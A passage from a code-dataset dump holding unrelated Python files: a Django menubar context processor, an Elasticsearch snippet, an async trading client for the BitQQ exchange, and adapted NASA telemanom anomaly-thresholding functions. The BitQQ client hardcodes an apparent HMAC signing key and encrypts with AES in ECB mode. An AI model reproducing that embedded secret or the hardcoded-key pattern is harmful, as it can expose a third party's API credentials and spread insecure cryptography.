Dashboard')\n","repo_name":"eervin123/feature-engineering","sub_path":"random-forest/run_optimizer.py","file_name":"run_optimizer.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"21789904665","text":"import datetime\nfrom database.models import Module, MetaData, Student\nfrom database.views import is_admin\nfrom django.contrib.auth.models import Group\nfrom django.template import Context, RequestContext\nfrom database.views import is_teacher, is_student, is_admin\n\n\ndef menubar(request):\n admin = False\n inactive = False\n alumni = False\n unassigned = False\n user_is_student = False\n if is_teacher(request.user) or is_admin(request.user):\n future = []\n past = []\n current = []\n meta = MetaData.objects.get(data_id=1)\n current_year = meta.current_year\n all_modules = Module.objects.all()\n for module in all_modules:\n if (request.user in module.instructors.all() or\n is_admin(request.user)):\n if module.year == current_year:\n current.append(module)\n elif module.year > current_year:\n future.append(module)\n elif module.year < current_year:\n past.append(module)\n current.sort(key=lambda x: x.title)\n future.sort(key=lambda x: x.title)\n past.sort(key=lambda x: x.title)\n if is_admin(request.user):\n admin = True\n# admins = Group.objects.get(name=\"admins\").user_set.all()\n# if request.user in admins:\n# admin = True\n# else:\n# admin = False\n inactive_students = Student.objects.filter(active=False)\n if len(inactive_students) > 0:\n if admin:\n inactive = True\n alumni_students = Student.objects.filter(year=9)\n if len(alumni_students) > 0:\n alumni = True\n 
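Stripped of the model fitting, the sweep that `TechnicalIndicatorOptimizer` runs above is a plain grid search over (parameter, horizon) pairs; `evaluate` below is a dummy stand-in I assume in place of the class's real scoring:

from itertools import product

param_values = [5, 10, 20, 50, 100]
horizons = [5, 30, 60, 90, 120]

def evaluate(length, horizon):
    return -abs(length - horizon)  # dummy score; the real class fits a model per combination

best = max(product(param_values, horizons), key=lambda p: evaluate(*p))
print(best)  # (5, 5) under the dummy score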
not_assigned = Student.objects.filter(year=None)\n if len(not_assigned) > 0:\n unassigned = True\n module_dict = {'current': current, 'past': past, 'future': future}\n else: # Student View\n module_dict = {}\n user_is_student = True\n return {\n 'module_dict': module_dict,\n 'admin': admin,\n 'inactive': inactive,\n 'alumni': alumni,\n 'unassigned': unassigned,\n 'user_is_student': user_is_student\n }\n","repo_name":"tobi2006/mysds","sub_path":"database/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27808776978","text":"from elasticsearch import Elasticsearch\n\nes=Elasticsearch()\n# add a document\nes.index(index=\"my_index\",doc_type=\"test_type\",id=1,body={\"name\":\"python\",\"addr\":\"深圳\"})\n# query documents\nresult = es.search(index=\"my_index\",doc_type=\"test_type\")\n# print all hits\nfor item in result[\"hits\"][\"hits\"]:\n print(item[\"_source\"])\n","repo_name":"hua1054921935/TeacherManager","sub_path":"elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72122179950","text":"# encoding: utf-8\nimport json\nimport time\nimport hmac\nimport copy\nimport binascii\nimport asyncio\nfrom urllib.parse import urljoin, quote\nimport hashlib\n\nfrom quant import const\nfrom quant.error import Error\nfrom quant.utils import logger\nfrom quant.const import BITQQ\nfrom quant.order import Order\nfrom quant.tasks import SingleTask, LoopRunTask\nfrom quant.asset import Asset, AssetSubscribe\nfrom quant.utils.http_client import AsyncHttpRequests\nfrom quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL\nfrom quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET\nfrom quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, \\\n ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED, ORDER_STATUS_PENDING_CANCEL\nfrom base64 import b64encode\nfrom Crypto.Cipher import AES\n\n__all__ = (\"BitQQRestAPI\", \"BitQQTrade\")\n\n\ndef convert_md5(origin):\n result = []\n s = \"\"\n for i in range(len(origin)):\n s += origin[i]\n if i % 2 != 0:\n int_hex = int(s, 16)\n result.append(int_hex)\n s = \"\"\n\n return result\n\n\ndef encryption_md5_buy_key(data):\n key = 'T5xJUNDA6hzxBuuwx8arhsDxCNGbO7iL'\n encode_data1 = data.encode()\n result1 = hmac.new(key.encode(), encode_data1, digestmod='MD5').hexdigest()\n last_result = convert_md5(result1)\n l_result = bytearray(last_result)\n lll_result = b64encode(l_result)\n return lll_result.decode()\n\n\nclass AESCipher:\n \"\"\"AES ECB 128-bit encryption.\"\"\"\n\n def __init__(self, key, BLOCK_SIZE):\n self.key = key\n self.BLOCK_SIZE = BLOCK_SIZE\n\n def pad(self, s):\n return s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE)\n\n def unpad(self, s):\n return s[:-ord(s[len(s) - 1:])]\n\n def encrypt(self, raw):\n raw = self.pad(raw)\n cipher = AES.new(self.key, AES.MODE_ECB)\n ret = cipher.encrypt(raw.encode()) # encrypt the plaintext pwd into ciphertext\n return ret.hex() # return the ciphertext as hex\n\n def decrypt(self, enc):\n enc = binascii.unhexlify(enc)\n cipher = AES.new(self.key, AES.MODE_ECB)\n return self.unpad(cipher.decrypt(enc)).decode('utf8')\n\n\nclass BitQQRestAPI:\n\n def __init__(self, host, access_key, secret_key, passphrase, order_module_host=None):\n \"\"\"The API is not public yet, so access_key stands for the account and secret_key for the password.\"\"\"\n self._host = host\n self._order_module_host = 
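Aside: `convert_md5` above simply re-packs the hex digest into its raw bytes, so the whole signing step collapses to `hmac(...).digest()` plus base64; a self-contained equivalent (dummy key and payload, not the exchange's) is:

import hashlib
import hmac
from base64 import b64encode

def sign(payload: str, key: str) -> str:
    # HMAC-MD5 raw digest, base64-encoded; equivalent to hexdigest -> byte pairs -> b64.
    digest = hmac.new(key.encode(), payload.encode(), hashlib.md5).digest()
    return b64encode(digest).decode()

print(sign("example-payload", "example-key"))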
order_module_host\n self._access_key = access_key\n self.secret_key = secret_key\n self.passphrase = passphrase # account id\n # self.token = None\n # SingleTask.run(self.login)\n # LoopRunTask.register(self.login, interval=60 * 60)\n\n async def get_spot_accounts(self):\n uri = 'api/userfund/list'\n success, error = await self.request('GET', uri, auth=True)\n # print(success, error)\n return success, error\n\n # async def login(self, *args, **kwargs):\n # t = int(time.time() * 1000)\n # key = \"mN4Yn8Or8r7SH1w4VnpS5lMS\"\n # BLOCK_SIZE = 16 # Bytes\n # md = hashlib.md5()\n # md.update(key.encode())\n #\n # ret = md.hexdigest() # md5-hash the key and take the hex digest\n # ret_16bit = convert_md5(ret) # convert the digest into an int array\n # bytess = bytearray(ret_16bit) # convert the array to a bytearray\n #\n # aes = AESCipher(bytess, BLOCK_SIZE)\n # en = aes.encrypt(self.secret_key) # encrypt the password\n # ss = self.secret_key + str(t) + en\n # sign = encryption_md5_buy_key(ss) # generate the signature\n #\n # uri = 'api/user/login'\n #\n # sign = sign.replace('+', '%2B')\n #\n # params = {\n # 'userAccount': self._access_key,\n # 'password': en,\n # 'device': 'oNrTBq4u3gP9G0ns2SoKypG9X',\n # 'loginTime': t,\n # 'sign': sign,\n # 'type': 2\n # }\n # while True:\n # success, error = await self.request('POST', uri, params=params, auth=False)\n # if success:\n # if success['state'] == 0:\n # self.token = success['token']\n # logger.info('login succeeded', self.token)\n # else:\n # self.token = None\n # else:\n # self.token = None\n # logger.error('login failed', error)\n # if self.token:\n # break\n # asyncio.sleep(2)\n\n async def create_order(self, action, symbol, price, quantity, *args):\n \"\"\"\n\n :param action:\n :param symbol: trading pair symbol, e.g. eos_usdt\n :param price: price, float\n :param quantity: trade amount, float\n :param order_type:\n :param account_type: 1 = spot, 2 = margin\n :return:\n \"\"\"\n uri = 'coin/entrust/robot/order'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/robot/order'\n is_order_module = True\n params = {\n 'type': \"buy\" if action == ORDER_ACTION_BUY else \"sell\",\n 'amount': quantity,\n 'price': price,\n 'symbol': symbol,\n }\n\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def revoke_order(self, order_no):\n uri = 'coin/entrust/revoke'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/revoke'\n is_order_module = True\n\n params = {\n 'orderId': order_no\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def revoke_orders(self, *order_ids):\n uri = 'coin/entrust/robot/batchOrder'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/robot/batchOrder'\n is_order_module = True\n\n order_ids_str = [str(id) for id in order_ids]\n if len(order_ids_str) > 12:\n order_ids_str = order_ids_str[:12]\n params = {\n 'orderIds': ','.join(order_ids_str)\n }\n\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def get_user_account(self):\n url = 'api/userfund/list'\n success, error = await self.request('GET', uri=url, auth=True)\n return success, error\n\n async def get_order_info(self, order_no):\n uri = 'coin/user/robot/orderDetail'\n is_order_module = False\n if self._order_module_host:\n uri = 'user/robot/orderDetail'\n is_order_module = True\n params = {\n 'orderId': order_no\n }\n success, error = await self.request('POST', uri=uri, 
params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def get_order_list(self, symbol):\n uri = 'coin/user/robot/currOrderList'\n is_order_module = False\n if self._order_module_host:\n uri = 'user/robot/currOrderList'\n is_order_module = True\n params = {\n 'symbol': symbol,\n 'module': 1,\n 'page': 0,\n 'limit': 999\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n return success, error\n\n async def get_kline(self, symbol, kline_type=const.MARKET_TYPE_KLINE, start=None, limit=20):\n uri = 'public/market/kline'\n params = {\n 'symbol': symbol,\n 'page': 1,\n 'limit': limit\n }\n if kline_type == const.MARKET_TYPE_KLINE:\n params['timeType'] = 1\n elif kline_type == const.MARKET_TYPE_KLINE_5M:\n params['timeType'] = 2\n elif kline_type == const.MARKET_TYPE_KLINE_15M:\n params['timeType'] = 3\n elif kline_type == const.MARKET_TYPE_KLINE_30M:\n params['timeType'] = 4\n elif kline_type == const.MARKET_TYPE_KLINE_1H:\n params['timeType'] = 5\n elif kline_type == const.MARKET_TYPE_KLINE_24H:\n params['timeType'] = 6\n\n success, error = await self.request('POST', uri=uri, params=params)\n if success:\n kline_list = list()\n klines = success['data']['list']\n for kline in klines:\n ts_str = kline['createDate']\n ts = int(time.mktime(time.strptime(ts_str, '%Y-%m-%d %H:%M:%S'))) * 1000\n kline['createDate'] = ts\n if ts >= start:\n kline_list.append(kline)\n if len(kline_list) > limit:\n return kline_list[0:limit], None\n else:\n return kline_list, None\n else:\n return success, error\n\n async def get_latest_price(self, symbol):\n \"\"\"Fetch the latest trade price.\"\"\"\n uri = '/public/market/lastOrder'\n params = {\n 'symbol': symbol,\n 'limit': 1\n }\n\n success, error = await self.request('POST', uri=uri, params=params)\n return success, error\n\n async def request(self, method, uri, params=None, body=None, auth=False, is_order_module=False):\n \"\"\" Send a request\n @param method HTTP method GET / POST / DELETE / PUT\n @param uri request uri\n @param params dict query parameters\n @param body dict request body data\n @param headers HTTP headers\n @param auth boolean whether to attach authentication\n @:return: on success, success holds the response data and error is None; on failure, success is None and error holds the error message\n \"\"\"\n # add the signature parameter\n if auth:\n if params is None:\n params = dict()\n\n params['userId'] = self.passphrase\n\n if params:\n query = \"&\".join([\"{}={}\".format(k, params[k]) for k in sorted(params.keys())])\n uri += '?' 
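The query string that `request` builds before signing is just a sorted-key join; on a toy dict:

params = {"b": 2, "a": 1, "userId": "42"}
query = "&".join(["{}={}".format(k, params[k]) for k in sorted(params.keys())])
assert query == "a=1&b=2&userId=42"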
+ query\n        url = urljoin(self._host, uri)\n        if self._order_module_host and is_order_module:\n            url = urljoin(self._order_module_host, uri)\n\n        headers = {\n            'Content-Type': 'application/json'\n        }\n        _, success, error = await AsyncHttpRequests.fetch(method, url, body=body, headers=headers, timeout=30)\n        # print('raw result:', success, error)\n        logger.debug(url)\n        if success:\n            try:\n                if isinstance(success, str):\n                    success = json.loads(success)\n                if success.get('status') != 0 or success.get('msg') != 'success':\n                    return None, success\n            except Exception as e:\n                return None, e\n\n        return success, error\n\n\nclass BitQQTrade:\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        Initialize.\n        \"\"\"\n        e = None\n        if not kwargs.get(\"account\"):\n            e = Error(\"param account missing\")\n        if not kwargs.get(\"strategy\"):\n            e = Error(\"param strategy missing\")\n        if not kwargs.get(\"symbol\"):\n            e = Error(\"param symbol missing\")\n        if not kwargs.get(\"host\"):\n            kwargs[\"host\"] = \"http://dev.api.bitqq.vip:81\"\n        if not kwargs.get(\"wss\"):\n            kwargs['wss'] = 'wss://dev.websocket.bitqq.vip:9094'\n        if not kwargs.get(\"access_key\"):\n            e = Error(\"param access_key missing\")\n        if not kwargs.get(\"secret_key\"):\n            e = Error(\"param secret_key missing\")\n        if not kwargs.get(\"passphrase\"):\n            e = Error(\"param passphrase missing\")\n        if e:\n            logger.error(e, caller=self)\n            if kwargs.get(\"init_success_callback\"):\n                SingleTask.run(kwargs[\"init_success_callback\"], False, e)\n            return\n\n        self._account = kwargs[\"account\"]\n        self._strategy = kwargs[\"strategy\"]\n        self._platform = BITQQ\n        self._symbol = kwargs[\"symbol\"]\n        self._host = kwargs[\"host\"]\n        self._order_module_host = kwargs.get('order_module_host')\n        self._access_key = kwargs[\"access_key\"]\n        self._secret_key = kwargs[\"secret_key\"]\n        self._passphrase = kwargs[\"passphrase\"]\n        self._asset_update_callback = kwargs.get(\"asset_update_callback\")\n        self._order_update_callback = kwargs.get(\"order_update_callback\")\n        self._position_update_callback = kwargs.get(\"position_update_callback\")\n        self._init_success_callback = kwargs.get(\"init_success_callback\")\n        self._contract_update_callback = kwargs.get('contract_update_callback')\n\n        # initialize the REST API object\n        self._rest_api = BitQQRestAPI(self._host, self._access_key, self._secret_key, self._passphrase, order_module_host=self._order_module_host)\n\n        if self._asset_update_callback:\n            AssetSubscribe(self._platform, self._account, self.on_event_asset_update)\n\n        SingleTask.call_later(self.reset_order_list, delay=10)\n\n    @property\n    def rest_api(self):\n        return self._rest_api\n\n    async def on_event_asset_update(self, asset: Asset):\n        \"\"\"Asset data update callback.\"\"\"\n        self._assets = asset\n        SingleTask.run(self._asset_update_callback, asset)\n\n    async def reset_order_list(self):\n        # revoke all open orders for the current account\n        success, error = await self.revoke_all_order()\n        if error:\n            logger.error('failed to revoke all orders, error: ', error)\n            SingleTask.call_later(self.reset_order_list, delay=1)\n        else:\n            if self._init_success_callback:\n                SingleTask.run(self._init_success_callback, True, None)\n\n    async def get_latest_price(self, symbol=None):\n        if symbol is None:\n            symbol = self._symbol\n        success, error = await self._rest_api.get_latest_price(symbol)\n        if success:\n            if len(success['data']) > 0:\n                success = success['data'][0]['price']\n            else:\n                success = None\n        return success, error\n\n    async def revoke_order(self, *order_nos):\n        if len(order_nos) == 0:\n            return [], Error('no order ids provided')\n        else:\n            # batch revoke\n            result, error = await self._rest_api.revoke_orders(*order_nos)\n            if error:\n                for id in order_nos:\n                    
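# (Editorial comment, added) After a failed batch revoke, each order is re-queried one by one so its latest state still reaches the order-update callback; the 50 ms sleep between calls spaces out the polling requests.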
await self.get_order_info(id)\n                    await asyncio.sleep(0.05)\n                return [], error\n            else:\n                revoked_orders = result.get('data', [])\n                # logger.info('batch revoke result:', revoked_orders)\n                for id in order_nos:\n                    if id not in revoked_orders:\n                        await self.get_order_info(id)\n                        await asyncio.sleep(0.05)\n                return revoked_orders, None\n\n    async def create_order(self, action, price, quantity, *args):\n        result, error = await self._rest_api.create_order(action, self._symbol, price, quantity)\n        if error:\n            return None, error\n        else:\n            return result.get('data'), None\n\n    def _update_order(self, order_info=None, s_order_id=None):\n        \"\"\" Update order info.\n        \"\"\"\n        order = None\n        if order_info:\n            logger.debug('order info queried, order: ', order_info)\n            order_no = str(order_info['id'])\n            state = str(order_info[\"status\"])\n            remain = float(order_info[\"surplusCount\"])\n            utime = order_info[\"updateTime\"]\n            ctime = order_info[\"createDate\"]\n            action = ORDER_ACTION_BUY if str(order_info['orderType']) == \"1\" else ORDER_ACTION_SELL\n\n            if state == \"5\":\n                status = ORDER_STATUS_CANCELED\n            elif state == \"2\":\n                status = ORDER_STATUS_PARTIAL_FILLED\n            elif state == \"3\":\n                status = ORDER_STATUS_FILLED\n            elif state == \"4\":\n                status = ORDER_STATUS_PENDING_CANCEL\n            else:\n                status = ORDER_STATUS_SUBMITTED\n\n            info = {\n                \"platform\": self._platform,\n                \"account\": self._account,\n                \"strategy\": self._strategy,\n                \"order_no\": order_no,\n                \"action\": action,\n                \"symbol\": order_info['symbol'],\n                \"price\": order_info[\"putPrice\"],\n                \"quantity\": order_info[\"count\"],\n            }\n            order = Order(**info)\n\n            if order_info.get('dealPrice') is None:\n                avg_price = 0.0\n            else:\n                avg_price = float(order_info.get('dealPrice'))\n\n            order.remain = remain\n            order.status = status\n            order.avg_price = avg_price\n            order.ctime = ctime\n            order.utime = utime\n\n        if s_order_id:\n            info = {\n                \"platform\": self._platform,\n                \"account\": self._account,\n                \"strategy\": self._strategy,\n                \"order_no\": str(s_order_id),\n                \"symbol\": self._symbol,\n            }\n            order = Order(**info)\n            order.status = ORDER_STATUS_CANCELED\n\n        if order and self._order_update_callback:\n            SingleTask.run(self._order_update_callback, copy.copy(order))\n\n        return order\n\n    async def revoke_all_order(self):\n\n        data, error = await self._rest_api.get_order_list(self._symbol)\n        if error:\n            return None, error\n        else:\n            open_order_ids = [item['id'] for item in data['data']['list']]\n            if len(open_order_ids) == 0:\n                return [], None\n            result, error = await self._rest_api.revoke_orders(*open_order_ids)\n            if error:\n                return None, error\n            else:\n                revoked_order_ids = result.get('data', [])\n                if revoked_order_ids == open_order_ids:\n                    return [], None\n                else:\n                    unrevoked_num = len(open_order_ids) - len(revoked_order_ids)\n                    if unrevoked_num > 0:\n                        unrevoked_orders = [id for id in open_order_ids if id not in revoked_order_ids]\n                        return None, Error('{} orders still pending revocation, order ids: {}'.format(unrevoked_num, unrevoked_orders))\n                    else:\n                        return [], None\n\n    async def get_order_info(self, order_no):\n        order_info, error = await self._rest_api.get_order_info(order_no)\n\n        if error:\n            logger.debug('failed to query order detail, order id: {}, error: {}'.format(order_no, error))\n            if isinstance(error, dict) and error.get('state') == 2500:\n                logger.debug('order already deleted from database, id:', order_no)\n                order = self._update_order(s_order_id=order_no)\n                return copy.copy(order), None\n            return None, error\n        else:\n            order = self._update_order(order_info['data'])\n            return copy.copy(order), 
None\n","repo_name":"galendu/nextquant_inner","sub_path":"quant/platform/bitqq.py","file_name":"bitqq.py","file_ext":"py","file_size_in_byte":19167,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"73774371949","text":"\n# The below functions were taken from NASA JPL's 'telemanom' project that proposed the idea of nonparametric dynamic\n# thresholding.\n# The functions have been slightly modified for this project. I've made a few more parameters adjustable, like p from\n# the detect_anomalies function, for better testing\n\n# Standard modules\nimport progressbar\nfrom matplotlib import pyplot\nimport numpy as np\nimport math\nimport pandas as pd\nfrom itertools import groupby\nfrom operator import itemgetter\nimport more_itertools as mit\nfrom elasticsearch import Elasticsearch\nimport time\nimport json\nimport sys\nimport os\nfrom scipy.stats import norm\n\noriginal_author = 'Peter Schneider'\nmod_by = 'Isaac Burmingham'\n\n\n# number of values to evaluate in each batch\nbatch_size = 70\n# number of trailing batches to use in error calculation\nwindow_size = 30\n# determines window size used in EWMA smoothing (percentage of total values for channel)\nsmoothing_perc = 0.05\n# num previous timesteps provided to model to predict future values\nl_s = 250\n# number of values surrounding an error that are brought into the sequence (promotes grouping of nearby sequences)\nerror_buffer = 100\n# minimum percent decrease between max errors in anomalous sequences (used for pruning)\np = 0.35\n\n\ndef get_errors(y_test, y_hat, batch_size=70, window_size=30, smoothing_perc=0.05, anom=None, smoothed=True):\n    \"\"\"Calculate the difference between predicted telemetry values and actual values, then smooth residuals using\n    EWMA to encourage identification of sustained errors/anomalies.\n\n    Inputs:\n        y_test (np array): array of test targets corresponding to true values to be predicted at end of each sequence\n        y_hat (np array): predicted test values for each timestep in y_test\n        anom (dict): contains anomaly information for a given input stream\n        smoothed (bool): If False, return unsmoothed errors (used for assessing quality of predictions)\n\n\n    Outputs:\n        e (list): unsmoothed errors (residuals)\n        e_s (list): smoothed errors (residuals)\n    \"\"\"\n\n    # e = [abs(y_h - y_t[0]) for y_h, y_t in zip(y_hat, y_test)]\n    e = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_test)]\n\n    if not smoothed:\n        return e\n\n    smoothing_window = int(batch_size * window_size * smoothing_perc)\n    if not len(y_hat) == len(y_test):\n        raise ValueError(\n            \"len(y_hat) != len(y_test), can't calculate error: %s (y_hat) , %s (y_test)\" % (len(y_hat), len(y_test)))\n\n    e_s = list(pd.DataFrame(e).ewm(span=smoothing_window).mean().values.flatten())\n\n    # for values at beginning < sequence length, just use avg\n    if anom is None:\n        e_s[:l_s] = [np.mean(e_s[:l_s * 2])] * l_s\n    elif not anom['chan_id'] == 'C-2':  # anom occurs early in window (limited data available for channel)\n        e_s[:l_s] = [np.mean(e_s[:l_s * 2])] * l_s\n\n    # np.save(os.path.join(\"data\", anom['run_id'], \"smoothed_errors\", anom[\"chan_id\"] + \".npy\"), np.array(e_s))\n\n    return e_s\n\n\ndef process_errors(y_test, e_s, window_size=30, batch_size=70, p=0.25):\n    '''Using windows of historical errors (h = batch size * window size), calculate the anomaly\n    threshold (epsilon) and group any anomalous error values into continuous sequences. 
Calculate\n    score for each sequence using the max distance from epsilon.\n\n    Args:\n        y_test (np array): test targets corresponding to true telemetry values at each timestep t\n        e_s (list): smoothed errors (residuals) between y_test and y_hat\n\n    Optional:\n        window_size: sets the number of trailing batches used in the historical error window\n\n    Returns:\n        E_seq (list of tuples): Start and end indices for each anomalous sequence\n        anom_scores (list): Score for each anomalous sequence\n    '''\n\n    i_anom = []  # anomaly indices\n\n    num_windows = int((y_test.shape[0] - (batch_size * window_size)) / batch_size)\n\n    # decrease the historical error window size (h) if number of test values is limited\n    while num_windows < 0:\n        window_size -= 1\n        if window_size <= 0:\n            window_size = 1\n        num_windows = int((y_test.shape[0] - (batch_size * window_size)) / batch_size)\n        if window_size == 1 and num_windows < 0:\n            raise ValueError(\"Batch_size (%s) larger than y_test (len=%s). Adjust batch_size.\" % (\n                batch_size, y_test.shape[0]))\n\n    # Identify anomalies for each new batch of values\n    for i in range(1, num_windows + 2):\n        prior_idx = (i - 1) * (batch_size)\n        idx = (window_size * batch_size) + ((i - 1) * batch_size)\n\n        if i == num_windows + 1:\n            idx = y_test.shape[0]\n\n        window_e_s = e_s[prior_idx:idx]\n        window_y_test = y_test[prior_idx:idx]\n\n        epsilon = find_epsilon(window_e_s, error_buffer)\n        window_anom_indices = get_anomalies(window_e_s, window_y_test, epsilon, i - 1, i_anom, len(y_test), p)\n\n        # update indices to reflect true indices in full set of values (not just window)\n        i_anom.extend([i_a + (i - 1) * batch_size for i_a in window_anom_indices])\n\n    # group anomalous indices into continuous sequences\n    i_anom = sorted(list(set(i_anom)))\n    groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n    E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n    # calc anomaly scores based on max distance from epsilon for each sequence\n    anom_scores = []\n    for e_seq in E_seq:\n        score = max([abs(e_s[x] - epsilon) / (np.mean(e_s) + np.std(e_s)) for x in range(e_seq[0], e_seq[1])])\n        anom_scores.append(score)\n\n    return E_seq, anom_scores\n\n\ndef find_epsilon(e_s, error_buffer, sd_lim=12.0):\n    '''Find the anomaly threshold that maximizes function representing tradeoff between a) number of anomalies\n    and anomalous ranges and b) the reduction in mean and st dev if anomalous points are removed from errors\n    (see https://arxiv.org/pdf/1802.04431.pdf)\n\n    Args:\n        e_s (array): residuals between y_test and y_hat values (smoothed using EWMA)\n        error_buffer (int): if an anomaly is detected at a point, this is the number of surrounding values\n            to add to the anomalous range. 
this promotes grouping of nearby sequences and more intuitive results\n        sd_lim (float): The max number of standard deviations above the mean to calculate as part of the\n            argmax function\n\n    Returns:\n        sd_threshold (float): the calculated anomaly threshold in number of standard deviations above the mean\n    '''\n\n    mean = np.mean(e_s)\n    sd = np.std(e_s)\n\n    max_s = 0\n    sd_threshold = sd_lim  # default if no winner or too many anomalous ranges\n\n    # it is possible for sd to be 0; avoid divide by zero error\n    if sd == 0:\n        return sd_threshold\n\n    for z in np.arange(2.5, sd_lim, 0.5):\n        epsilon = mean + (sd * z)\n        pruned_e_s, pruned_i, i_anom = [], [], []\n\n        for i, e in enumerate(e_s):\n            if e < epsilon:\n                pruned_e_s.append(e)\n                pruned_i.append(i)\n            if e > epsilon:\n                for j in range(0, error_buffer):\n                    if not i + j in i_anom and not i + j >= len(e_s):\n                        i_anom.append(i + j)\n                    if not i - j in i_anom and not i - j < 0:\n                        i_anom.append(i - j)\n\n        if len(i_anom) > 0:\n            # preliminarily group anomalous indices into continuous sequences (# sequences needed for scoring)\n            i_anom = sorted(list(set(i_anom)))\n            groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n            E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n            perc_removed = 1.0 - (float(len(pruned_e_s)) / float(len(e_s)))\n            mean_perc_decrease = (mean - np.mean(pruned_e_s)) / mean\n            sd_perc_decrease = (sd - np.std(pruned_e_s)) / sd\n            s = (mean_perc_decrease + sd_perc_decrease) / (len(E_seq) ** 2 + len(i_anom))\n\n            # sanity checks\n            if s >= max_s and len(E_seq) <= 5 and len(i_anom) < (len(e_s) * 0.5):\n                sd_threshold = z\n                max_s = s\n\n    return sd_threshold  # multiply by sd and add the mean to get epsilon\n\n\ndef compare_to_epsilon(e_s, epsilon, len_y_test, inter_range, chan_std,\n                       std, error_buffer, window, i_anom_full):\n    '''Compare smoothed error values to epsilon (error threshold) and group consecutive errors together into\n    sequences.\n\n    Args:\n        e_s (list): smoothed errors between y_test and y_hat values\n        epsilon (float): Threshold for errors above which an error is considered anomalous\n        len_y_test (int): number of timesteps t in test data\n        inter_range (float): range between the 5th and 95th percentile values of the errors\n        chan_std (float): standard deviation on test values\n        std (float): standard deviation of smoothed errors\n        error_buffer (int): number of values surrounding anomalous errors to be included in anomalous sequence\n        window (int): Count of number of error windows that have been processed\n        i_anom_full (list): list of all previously identified anomalies in test set\n\n    Returns:\n        E_seq (list of tuples): contains start and end indices of anomalous ranges\n        i_anom (list): indices of errors that are part of an anomalous sequence\n        non_anom_max (float): highest smoothed error value below epsilon\n    '''\n\n    i_anom = []\n    E_seq = []\n    non_anom_max = 0\n\n    # Don't consider anything in window because scale of errors too small compared to scale of values\n    if not (std > (.05 * chan_std) or max(e_s) > (.05 * inter_range)) or not max(e_s) > 0.05:\n        return E_seq, i_anom, non_anom_max\n\n    # ignore initial error values until enough history for smoothing, prediction, comparisons\n    num_to_ignore = l_s * 2\n    # if y_test is small, ignore fewer\n    if len_y_test < 2500:\n        num_to_ignore = l_s\n    if len_y_test < 1800:\n        num_to_ignore = 0\n\n    for x in range(0, len(e_s)):\n\n        anom = True\n        if not e_s[x] > epsilon or not e_s[x] > 0.05 * inter_range:\n            anom = False\n\n        if anom:\n            for b in range(0, error_buffer):\n                if not x + b in i_anom and not 
x + b >= len(e_s) and (\n                        (x + b) >= len(e_s) - batch_size or window == 0):\n                    if not (window == 0 and x + b < num_to_ignore):\n                        i_anom.append(x + b)\n                # only considering new batch of values added to window, not full window\n                if not x - b in i_anom and ((x - b) >= len(e_s) - batch_size or window == 0):\n                    if not (window == 0 and x - b < num_to_ignore):\n                        i_anom.append(x - b)\n\n    # capture max of values below the threshold that weren't previously identified as anomalies\n    # (used in filtering process)\n    for x in range(0, len(e_s)):\n        adjusted_x = x + window * batch_size\n        if e_s[x] > non_anom_max and not adjusted_x in i_anom_full and not x in i_anom:\n            non_anom_max = e_s[x]\n\n    # group anomalous indices into continuous sequences\n    i_anom = sorted(list(set(i_anom)))\n    groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n    E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n    return E_seq, i_anom, non_anom_max\n\n\ndef prune_anoms(E_seq, e_s, non_anom_max, i_anom, p=0.25):\n    '''Remove anomalies that don't meet minimum separation from the next closest anomaly or error value\n\n    Args:\n        E_seq (list of lists): contains start and end indices of anomalous ranges\n        e_s (list): smoothed errors between y_test and y_hat values\n        non_anom_max (float): highest smoothed error value below epsilon\n        i_anom (list): indices of errors that are part of an anomalous sequence\n        p (float): minimum percent decrease\n    Returns:\n        i_pruned (list): remaining indices of errors that are part of anomalous sequences\n        after the pruning procedure\n    '''\n\n    E_seq_max, e_s_max = [], []\n    for e_seq in E_seq:\n        if len(e_s[e_seq[0]:e_seq[1]]) > 0:\n            E_seq_max.append(max(e_s[e_seq[0]:e_seq[1]]))\n            e_s_max.append(max(e_s[e_seq[0]:e_seq[1]]))\n    e_s_max.sort(reverse=True)\n\n    if non_anom_max and non_anom_max > 0:\n        e_s_max.append(non_anom_max)  # for comparing the last actual anomaly to next highest below epsilon\n\n    i_to_remove = []\n    # p = 0.25  # no longer hardcoded; p is now a parameter\n\n    for i in range(0, len(e_s_max)):\n        if i + 1 < len(e_s_max):\n            if (e_s_max[i] - e_s_max[i + 1]) / e_s_max[i] < p:\n                i_to_remove.append(E_seq_max.index(e_s_max[i]))\n                # p += 0.03 # increase minimum separation by this amount for each step further from max error\n            else:\n                i_to_remove = []\n    for idx in sorted(i_to_remove, reverse=True):\n      